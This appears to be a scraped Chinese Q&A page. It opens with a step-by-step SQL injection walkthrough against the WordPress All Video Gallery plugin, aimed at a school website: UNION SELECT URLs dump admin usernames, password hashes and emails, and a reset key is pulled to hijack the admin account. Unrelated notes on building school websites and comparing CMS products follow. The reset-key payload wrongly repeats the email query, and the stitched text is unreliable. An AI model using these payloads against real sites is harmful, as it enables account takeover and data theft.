SQL注入的基本原理
sql注入成因主要是對頁面參數沒有進行非法字元校驗導致,比如說一個訂單頁面要顯示某個客戶的所有訂單列表,這個頁面的地址可能是http://xxx.com/list.php?customID=3,我們推理,這樣頁面的後台處理的sql應該是這樣的:
select * form custom_order where custom_id = {$_GET['customID']}
按正常情況下,這里的接收的參數{$_GET['customID']}的值應該是傳入的值3,這樣頁面就能正確的把所有客戶ID等於3的訂單信息顯示到頁面上。但是,如果這個參數被人惡意改成了如下形式:
http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
按這樣的參數拼裝成的sql就成了這樣:
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
這樣注入惡意sql後,訂單列表頁顯示的就不是訂單信息了,而是資料庫中用戶的名稱和密碼,或者任意其它想要的信息。下面我們就按照這個原理來一步一步的獲取這個公立學校網站的管理員用戶名,管理員郵箱地址,通過郵箱重置管理員密碼,登錄超級管理員後台。
All Video Gallery插件的漏洞簡介
安裝了All Video Gallery插件的Wordpress博客里會有這樣的一個地址:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11
訪問這個頁面會顯示一些配置信息,問題就出在pid這個參數上,程序後台顯然沒有嚴格檢查這個參數,我們將利用這個參數進行sql注入。
WordPress是一個開源的平台,我們很容易弄清楚用戶表的表名是wp_users,存放用戶名,密碼,郵件地址的欄位分別是user_login,user_pass,user_email,我們下面將要把用戶信息表注入進去。
獲取超級管理員用戶名
為了獲取用戶表中的用戶名,我們注入的sql是這樣的:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
獲取超級管理員郵件地址
我們可以直接獲取用戶的密碼,但很顯然,密碼都是加密的,無法使用,我們這里使用另外一種思路,先獲取用戶的郵件地址,然後使用這個郵件重置用戶的密碼。
要獲取郵件地址,我們需要將上面的sql中的欄位名改成user_email:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
重置管理員密碼
WordPress的後台登陸地址是http://xxx.com/wp-login.php,這個地址是可以公共訪問的,我們進入這個頁面後,點擊Lost your password?鏈接,輸入上面獲取的管理員郵件。
這樣做了之後,Wordpress會向這個郵件地址發送一封含有激活碼的密碼重置地址。我們無法登陸這個郵箱獲取這個地址,但我們可以使用上面同樣
的方法獲取這個激活碼,自己拼裝出密碼重置地址。存放激活碼的欄位是user_activation_key,我們的sql注入地址改成下面這樣:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:
有了激活碼,我們就可以拼裝出裝置密碼的地址了:
http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username
利用這個地址進入重置密碼頁面:
總結
我們的黑客行動到此基本上是大功告成,但事實上我並沒有去執行最後一步。本文的目的不是要告訴人們如何進行黑客攻擊,而是要提醒大家防範安全漏洞,
所謂知己知彼,方能百戰不殆,程序員應當對基本的黑客攻擊方式有一些了解,針對性的在編程時避免造成類似sql注入的安全漏洞,構築更健壯的軟體。
B. 求一個關於學校的Html+Css的靜態網站源碼
直接去下載網站系統來做,適合做學校的比如pageadmin系統、wordpress系統這些都可以。
C. 一個學校網站應該包含哪些欄目
一般的網站後台都可以自己增加欄目的,你網站難道沒有後台嗎?
你可以去下載專業網站管理系統來用算了,
比如pageadmin系統、wordpress系統、shopex系統這些都很好用
D. 網站建設的步驟有哪些
一、確定網站主題網站主題就是你建立的網站所要包含的主要內容,一個網站必須要有一個明確的主題。特別是對於個人網站,你不可能像綜合網站那樣做得內容大而全,包羅萬象。你沒有這個能力,也沒這個精力,所以必須要找准一個自己最感興趣內容,做深、做透,辦出自己的特色,這樣才能給用戶留下深刻的印象。網站的主題無定則,只要是你感興趣的,任何內容都可以,但主題要鮮明,在你的主題范圍內內容做到大而全、精而深。
2
二、為網站選擇域名
一個企業的網站域名被稱為「網路商標」,一個與企業名稱和形象相符的網站域名,是企業實現網路營銷的前提。而網站是企業在互聯網上宣傳和展示企業形象的重要途徑。由於網站的域名具有唯一性,網站域名一旦注冊成功,任何其他組織機構或個人都無法注冊相同的域名。因此,網站的域名是企業重要的網路標識,在網路營銷中起到企業"網路商標"的作用,注冊域名時,要考慮到域名與企業的名稱、標識相符合。一個好的域名應該要簡潔,方便用戶記憶。
3
三、網站空間伺服器的選擇
一個網站的建設需要有自己的網站空間,要選擇合適的網站空間伺服器,空間的大小主要根據網站的規模、網站的內容多少來選擇,一般情況下,大型企業資金實力雄厚,而且基於企業自身龐大的網站資料庫以及數據安全方面的考慮,選擇購置自己的伺服器進行架設是比較好的;而中小型的企業網站建設比較樂於選擇虛擬主機服務,這樣便可以省去伺服器的管理及維護大筆費用。
一般的中小型企業網站選擇大小在100M-200M的虛擬主機空間就足夠用了。
4
四、規劃網站一個網站設計得成功與否,很大程度上決定於設計者的規劃水平,規劃網站就像設計師設計大樓一樣,圖紙設計好了,才能建成一座漂亮的樓房。網站規劃包含的內容很多,如網站的結構、欄目的設置、網站的風格、顏色搭配、版面布局、文字圖片的運用等,你只有在製作網頁之前把這些方面都考慮到了,才能在製作時駕輕就熟,胸有成竹。也只有如此製作出來的網頁才能有個性、有特色,具有吸引力。
5
五、製作網頁材料有了,工具也選好了,下面就需要按照規劃一步步地把自己的想法變成現實了,這是一個復雜而細致的過程,一定要按照先大後小、先簡單後復雜來進行製作。所謂先大後小,就是說在製作網頁時,先把大的結構設計好,然後再逐步完善小的結構設計。所謂先簡單後復雜,就是先設計出簡單的內容,然後再設計復雜的內容,以便出現問題時好修改。在製作網頁時要多靈活運用模板,這樣可以大大提高製作效率。
6
六、上傳測試網頁製作完畢,最後要發布到Web伺服器上,才能夠讓全世界的朋友觀看,現在上傳的工具有很多,有些網頁製作工具本身就帶有FTP功能,利用這些FTP工具,你可以很方便地把網站發布到自己申請的主頁存放伺服器上。網站上傳以後,你要在瀏覽器中打開自己的網站,逐頁逐個鏈接的進行測試,發現問題,及時修改,然後再上傳測試。全部測試完畢就可以把你的網址旺合盛世科技告訴給朋友,讓他們來瀏覽。
7
七、維護更新網站要注意經常維護更新內容,保持內容的新鮮,不要一做好就放在那兒不變了,只有不斷地給它補充新的內容,才能夠吸引住瀏覽者
E. 教育類網站國微cms和帝國cms哪個更好一些
帝國CMS
非常老牌的CMS,就如同該CMS官網介紹的安全、強大、穩定、靈活。
安全性:高,姜就是老的辣,老牌的CMS就是靠譜,安全性四顆星★★★★☆。
模板豐富度:帝國CMS的模板與程序分離,在二次開發與模板設計上非常靈活,這樣就決定著要對PHP有一點了解,標簽的參數較為復雜,網路上的資源較為豐富,但是模板的導入導出功能對新手不太友好,同時擴展庫也較為豐富,三顆星★★★☆☆。
上手簡易度:帝國CMS後台設置參數較多,所有信息皆存儲在資料庫中,功能搭配上較為嚴謹,對新手來說需要一定的學習成本,三顆星★★★☆☆。
國微CMS
國微CMS為國內最主流的CMS系統之一,也是中國南方PHP領域最大的開源平台提供商。現擁有平台注冊用戶超過23萬,下載次數達到70餘萬次,主要面向政府、軍隊、學校、集團級客戶。耕耘八年,國微CMS採用二代框架,在系統高性能、速度、模塊化、體系化、可視化等方面極具核心競爭優勢, 可確保客戶運營成功。
網路轉載!